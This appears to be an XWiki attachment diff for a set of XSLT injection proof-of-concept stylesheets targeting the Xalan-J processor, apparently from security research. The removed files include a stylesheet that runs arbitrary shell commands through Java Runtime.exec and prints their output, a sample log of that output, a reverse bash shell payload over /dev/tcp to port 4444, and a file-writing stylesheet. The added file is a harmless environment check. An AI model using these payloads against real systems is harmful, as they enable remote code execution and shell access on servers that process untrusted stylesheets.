Size
... ... @@ -1,1 +1,0 @@
1 -1.2 KB
Content
... ... @@ -1,40 +1,0 @@
1 -OS [Linux] ...
2 -Executing [id] ...
3 -uid=1000(nic0b) gid=1000(nic0b) groupes=20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(nic0b)
4 -
5 -OS [Linux] ...
6 -Executing [date] ...
7 -jeudi 12 janvier 2012, 22:58:55 (UTC+0100)
8 -
9 -OS [Linux] ...
10 -Executing [ifconfig lo] ...
11 -lo Link encap:Boucle locale
12 - inet adr:127.0.0.1 Masque:255.0.0.0
13 - adr inet6: ::1/128 Scope:HĂ´te
14 - UP LOOPBACK RUNNING MTU:16436 Metric:1
15 - Packets reçus:7830 erreurs:0 :0 overruns:0 frame:0
16 - TX packets:7830 errors:0 dropped:0 overruns:0 carrier:0
17 - collisions:0 lg file transmission:0
18 - Octets reçus:1543564 (1.5 MB) Octets transmis:1543564 (1.5 MB)
19 -
20 -
21 -OS [Linux] ...
22 -Executing [tree /var/cache/apt] ...
23 -/var/cache/apt
24 -|-- apt-file
25 -| |-- fr.archive.ubuntu.com_ubuntu_dists_lucid_Contents-i386.gz
26 -| |-- fr.archive.ubuntu.com_ubuntu_dists_lucid-updates_Contents-i386.gz
27 -| `-- security.ubuntu.com_ubuntu_dists_lucid-security_Contents-i386.gz
28 -|-- archives
29 -| |-- lock
30 -| `-- partial
31 -|-- pkgcache.bin
32 -`-- srcpkgcache.bin
33 -
34 -3 directories, 6 files
35 -
36 -OS [Linux] ...
37 -Executing [uname -a] ...
38 -Linux testbox4 2.6.32-37-generic #81-Ubuntu SMP Fri Dec 2 20:35:14 UTC 2011 i686 GNU/Linux
39 -
40 -
Icon xalanj-reading-stdout.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -5.1 KB
Content
... ... @@ -1,82 +1,0 @@
1 -<?xml version="1.0" encoding="iso-8859-1"?>
2 -<!--
3 -
4 - File generated by translating loops into recursive template calls.
5 - XSLT Loop Compiler, Version 1.0
6 - GPL (c) O. Becker
7 -
8 - -->
9 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:j="http://xml.apache.org/xalan/java" xmlns:bufferedreader="xalan://java.io.BufferedReader" xmlns:inputstreamreader="xalan://java.io.InputStreamReader" xmlns:process="xalan://java.lang.Process" xmlns:runtime="xalan://java.lang.Runtime" xmlns:loop="http://informatik.hu-berlin.de/loop" exclude-result-prefixes="j" version="1.0">
10 -
11 - <!-- Configure the output -->
12 - <xsl:output method="text"/>
13 - <xsl:strip-space elements="*"/>
14 -
15 - <!-- Some variables -->
16 - <xsl:variable name="rt" select="runtime:getRuntime()"/>
17 - <xsl:variable name="os" select="j:java.lang.System.getProperty('os.name')"/>
18 - <xsl:variable name="unix_shell" select="'/bin/bash'"/>
19 - <xsl:variable name="unix_option" select="'-c'"/>
20 - <xsl:variable name="win_shell" select="'cmd.exe'"/>
21 - <xsl:variable name="win_option" select="'/C'"/>
22 - <xsl:variable name="delim" select="' -=DELIM=- '"/>
23 -
24 - <!-- The main template -->
25 - <xsl:template match="//command">
26 -
27 - <!-- Fetch from the XML file -->
28 - <xsl:variable name="command" select="text()"/>
29 -
30 - <!-- Check the underlying OS -->
31 - <xsl:variable name="tmp">
32 - <xsl:choose>
33 - <xsl:when test="contains($os, 'indows')">
34 - <xsl:value-of select="concat($win_shell, $delim, $win_option, $delim, $command)"/>
35 - </xsl:when>
36 - <xsl:otherwise>
37 - <xsl:value-of select="concat($unix_shell, $delim, $unix_option, $delim, $command)"/>
38 - </xsl:otherwise>
39 - </xsl:choose>
40 - </xsl:variable>
41 - <xsl:variable name="cmd" select="j:java.lang.String.new($tmp)"/>
42 -
43 - <!-- Create the process and its streams -->
44 - <xsl:variable name="array" select="j:split($cmd, $delim)"/>
45 - <xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
46 - <xsl:variable name="inputstream" select="process:getInputStream($proc)"/>
47 - <xsl:variable name="inputstreamreader" select="inputstreamreader:new($inputstream)"/>
48 - <xsl:variable name="bufferedreader" select="bufferedreader:new($inputstreamreader)"/>
49 -
50 - <!-- Print the detected OS -->
51 - <xsl:text>OS [</xsl:text>
52 - <xsl:value-of select="$os"/>
53 - <xsl:text>] ...
54 -</xsl:text>
55 -
56 - <!-- Print the executed command -->
57 - <xsl:text>Executing [</xsl:text>
58 - <xsl:value-of select="$command"/>
59 - <xsl:text>] ...
60 -</xsl:text>
61 -
62 - <!-- Prepare the loop -->
63 - <xsl:variable name="cond" select="1"/>
64 - <xsl:variable name="result" select="N/A"/>
65 - <axslt:call-template xmlns:axslt="http://www.w3.org/1999/XSL/Transform" name="while-loop-id2496582"><axslt:with-param name="command" select="$command"/><axslt:with-param name="tmp" select="$tmp"/><axslt:with-param name="cmd" select="$cmd"/><axslt:with-param name="array" select="$array"/><axslt:with-param name="proc" select="$proc"/><axslt:with-param name="inputstream" select="$inputstream"/><axslt:with-param name="inputstreamreader" select="$inputstreamreader"/><axslt:with-param name="bufferedreader" select="$bufferedreader"/><axslt:with-param name="cond" select="$cond"/><axslt:with-param name="result" select="$result"/></axslt:call-template>
66 - </xsl:template>
67 -<axslt:template xmlns:axslt="http://www.w3.org/1999/XSL/Transform" name="while-loop-id2496582"><axslt:param name="command"/><axslt:param name="tmp"/><axslt:param name="cmd"/><axslt:param name="array"/><axslt:param name="proc"/><axslt:param name="inputstream"/><axslt:param name="inputstreamreader"/><axslt:param name="bufferedreader"/><axslt:param name="cond"/><axslt:param name="result"/><axslt:choose><axslt:when test="$cond">
68 - <xsl:variable name="line" select="bufferedreader:readLine($bufferedreader)"/>
69 - <xsl:variable name="class" select="j:toString(j:getClass($line))"/>
70 - <xsl:variable name="continue" select="j:equals($class, 'class java.lang.String')"/>
71 - <!-- Debug code
72 - <xsl:text>Line: </xsl:text><xsl:value-of select="$line"/> <xsl:text>&#xA;</xsl:text>
73 - <xsl:text>Loop : </xsl:text><xsl:value-of select="$continue"/> <xsl:text>&#xA;</xsl:text>
74 - -->
75 - <axslt:call-template name="while-loop-id2496582"><axslt:with-param name="command" select="$command"/><axslt:with-param name="tmp" select="$tmp"/><axslt:with-param name="cmd" select="$cmd"/><axslt:with-param name="array" select="$array"/><axslt:with-param name="proc" select="$proc"/><axslt:with-param name="inputstream" select="$inputstream"/><axslt:with-param name="inputstreamreader" select="$inputstreamreader"/><axslt:with-param name="bufferedreader" select="$bufferedreader"/><axslt:with-param name="cond" select="$continue"/><axslt:with-param name="result" select="concat($result, $line, '&#10;')"/></axslt:call-template></axslt:when><axslt:otherwise>
76 - <!-- Debug code
77 - <xsl:text>Result:</xsl:text>
78 - <xsl:text>&#xA;</xsl:text>
79 - -->
80 - <xsl:value-of select="$result"/>
81 - </axslt:otherwise></axslt:choose></axslt:template></xsl:stylesheet>
82 -
Icon xalanj-reverse-bash.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -1002 bytes
Content
... ... @@ -1,31 +1,0 @@
1 -<xsl:stylesheet
2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
3 - xmlns:jv="http://xml.apache.org/xalan/java"
4 - exclude-result-prefixes="jv"
5 - version="1.0">
6 -
7 - <xsl:template match="/">
8 -
9 - <xsl:variable name="test"><![CDATA[/bin/bash ==== -c ==== /bin/bash 7<>/dev/tcp/127.0.0.1/4444 <&7 >&7]]></xsl:variable>
10 - <xsl:variable name="a" select="jv:split($test, ' ==== ')"/>
11 - <xsl:variable name="rtobject" select="jv:java.lang.Runtime.getRuntime()"/>
12 - <xsl:variable name="process" select="jv:exec($rtobject, $a )"/>
13 -
14 -Objet "String" :
15 - <xsl:value-of select="$test"/>
16 -
17 -Objet "Array" :
18 - <xsl:variable name="aAsString" select="jv:toString($a)"/>
19 - <xsl:value-of select="$aAsString"/>
20 -
21 -Objet "Runtime" :
22 - <xsl:variable name="rtobjectAsString" select="jv:toString($rtobject)"/>
23 - <xsl:value-of select="$rtobjectAsString"/>
24 -
25 -Objet "Process" :
26 - <xsl:variable name="processAsString" select="jv:toString($process)"/>
27 - <xsl:value-of select="$processAsString"/>
28 -
29 - </xsl:template>
30 -</xsl:stylesheet>
31 -
Icon xalanj-write.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -373 bytes
Content
... ... @@ -1,13 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 - xmlns:redir="http://xml.apache.org/xalan/redirect"
3 - extension-element-prefixes="redir"
4 - version='1.0'>
5 -
6 - <xsl:template match="/">
7 - <redir:write file="/tmp/created_by_xalanj_write" method="text">
8 - <xsl:text>Just a PoC</xsl:text>
9 - </redir:write>
10 - </xsl:template>
11 -
12 -</xsl:stylesheet>
13 -
Icon checkenv.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +324 bytes
Content
... ... @@ -1,0 +1,14 @@
1 +<?xml version="1.0"?>
2 +
3 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
4 + xmlns:xalan="http://xml.apache.org/xalan"
5 + exclude-result-prefixes="xalan"
6 + version="1.0">
7 +
8 + <xsl:output indent="yes"/>
9 + <xsl:template match="/">
10 + <xsl:copy-of select="xalan:checkEnvironment()"/>
11 + </xsl:template>
12 +
13 +</xsl:stylesheet>
14 +